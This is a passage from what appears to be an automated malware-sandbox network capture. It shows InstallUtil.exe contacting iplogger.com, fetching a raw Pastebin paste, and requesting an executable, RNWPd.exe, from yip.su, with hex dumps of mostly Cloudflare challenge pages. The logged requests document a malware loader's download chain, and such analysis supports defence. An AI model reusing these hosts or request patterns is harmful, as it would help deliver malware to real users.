                            Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                            2024-09-10 16:21:06 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                            Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                            2024-09-10 16:21:06 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                            Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                            2024-09-10 16:21:06 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                            2024-09-10 16:21:06 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.1149715104.21.76.574437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:11 UTC68OUTGET /1djqU4 HTTP/1.1
                            Host: iplogger.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:11 UTC1285INHTTP/1.1 403 Forbidden
                            Date: Tue, 10 Sep 2024 16:21:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                            Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                            Cross-Origin-Embedder-Policy: require-corp
                            Cross-Origin-Opener-Policy: same-origin
                            Cross-Origin-Resource-Policy: same-origin
                            Origin-Agent-Cluster: ?1
                            Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                            Referrer-Policy: same-origin
                            X-Content-Options: nosniff
                            X-Frame-Options: SAMEORIGIN
                            cf-mitigated: challenge
                            2024-09-10 16:21:11 UTC693INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4c 54 70 54 53 50 2f 64 63 62 52 4a 31 4a 45 58 73 47 33 50 7a 4e 45 78 6a 55 56 4f 48 7a 49 4f 59 69 2f 73 37 44 37 6d 36 4f 57 38 56 32 51 4b 4b 6e 35 50 46 79 32 43 53 77 53 73 6a 56 54 53 65 75 64 77 4f 4e 39 64 62 62 4e 46 77 42 76 2f 75 5a 66 72 48 74 62 56 37 44 4b 57 73 74 42 70 64 41 38 68 58 6a 71 62 31 42 6f 3d 24 4d 34 50 47 4b 70 50 39 61 73 30 62 74 36 57 6a 32 48 59 55 5a 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                            Data Ascii: cf-chl-out: LTpTSP/dcbRJ1JEXsG3PzNExjUVOHzIOYi/s7D7m6OW8V2QKKn5PFy2CSwSsjVTSeudwON9dbbNFwBv/uZfrHtbV7DKWstBpdA8hXjqb1Bo=$M4PGKpP9as0bt6Wj2HYUZw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                            2024-09-10 16:21:11 UTC1369INData Raw: 34 30 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                            Data Ascii: 40c5<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                            2024-09-10 16:21:11 UTC1369INData Raw: 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67
                            Data Ascii: MSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.theme-dark #challenge-error-text{background-image:url(data:image/svg
                            2024-09-10 16:21:11 UTC1369INData Raw: 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d
                            Data Ascii: Igdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuM
                            2024-09-10 16:21:11 UTC1369INData Raw: 2e 33 39 31 70 78 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 67 72 69 64 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 66 65 65 64 62 61 63 6b 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 30 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 68 65 69 67 68 74 3a 32 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 3b 77 69 64 74 68 3a 32 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68
                            Data Ascii: .391px}.feedback-content{align-content:space-between;display:inline-grid;height:100vh;margin:0;padding:0}.feedback-content .spacer{margin:0}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media (width <= 720px){.main-content{margin-top:4rem}.h
                            2024-09-10 16:21:11 UTC1369INData Raw: 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c
                            Data Ascii: tLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url
                            2024-09-10 16:21:11 UTC1369INData Raw: 6c 65 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68 3a 35 30 25 7d 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 20 2e 72 61 79 2d 69 64 20 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28
                            Data Ascii: le}.clearfix .column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer .ray-id{text-align:center}.footer .ray-id code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (
                            2024-09-10 16:21:11 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 20 61 7b 63
                            Data Ascii: allenge-error-text{background-position:100%;padding-left:0;padding-right:34px}.challenge-content .spacer{margin:2rem 0}.challenge-content .loading-spinner{height:76.391px}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body a{c
                            2024-09-10 16:21:11 UTC1369INData Raw: 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e
                            Data Ascii: S4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}</style><meta http-equiv="refresh" conten
                            2024-09-10 16:21:11 UTC1369INData Raw: 77 56 4e 38 41 4a 44 5f 53 38 4b 47 70 51 59 6b 61 39 5a 46 75 33 6f 7a 6d 4d 5f 6a 54 77 6e 6e 65 59 78 30 77 71 37 47 5f 6c 49 56 79 6a 75 6a 6f 36 76 48 5a 67 52 74 36 41 4e 6b 44 4e 6d 77 4c 76 61 6a 32 34 74 4e 64 6e 7a 69 6c 65 50 5a 4e 6a 78 79 4f 59 36 78 61 62 77 70 70 6d 30 54 6e 72 62 44 4a 56 53 43 77 42 71 78 58 4b 72 51 41 4d 44 50 76 7a 79 2e 6b 32 37 4d 2e 75 56 32 66 2e 44 66 46 55 52 57 47 4e 70 34 6e 44 74 4d 6d 32 32 47 6e 57 43 6e 34 52 4a 48 4f 48 57 65 55 46 6c 41 58 71 51 73 61 67 54 67 5f 49 54 4c 66 6a 63 45 66 2e 47 38 78 76 31 69 62 36 64 70 4f 46 55 6a 31 5f 69 36 54 41 6e 32 56 70 79 66 6a 5a 46 6f 42 74 6d 38 52 75 41 51 38 30 7a 69 47 4f 31 4c 4f 78 2e 69 47 38 43 69 6b 38 79 47 54 6b 31 55 4e 62 5f 41 33 2e 53 72 70 75 52
                            Data Ascii: wVN8AJD_S8KGpQYka9ZFu3ozmM_jTwnneYx0wq7G_lIVyjujo6vHZgRt6ANkDNmwLvaj24tNdnzilePZNjxyOY6xabwppm0TnrbDJVSCwBqxXKrQAMDPvzy.k27M.uV2f.DfFURWGNp4nDtMm22GnWCn4RJHOHWeUFlAXqQsagTg_ITLfjcEf.G8xv1ib6dpOFUj1_i6TAn2VpyfjZFoBtm8RuAQ80ziGO1LOx.iG8Cik8yGTk1UNb_A3.SrpuR


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.1149716104.20.3.2354437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:11 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                            Host: pastebin.com
                            Connection: Keep-Alive
                            2024-09-10 16:21:11 UTC222INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Server: cloudflare
                            CF-RAY: 8c10bfed5f797c7b-EWR
                            2024-09-10 16:21:11 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                            Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                            2024-09-10 16:21:11 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                            Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                            2024-09-10 16:21:11 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                            Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                            2024-09-10 16:21:11 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                            Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                            2024-09-10 16:21:11 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.1149717188.114.97.34437848C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-09-10 16:21:12 UTC65OUTGET /RNWPd.exe HTTP/1.1
                            Host: yip.su
                            Connection: Keep-Alive
                            2024-09-10 16:21:12 UTC898INHTTP/1.1 200 OK
                            Date: Tue, 10 Sep 2024 16:21:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            memory: 0.36197662353515625
                            expires: Tue, 10 Sep 2024 16:21:12 GMT
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: HIT
                            Age: 0
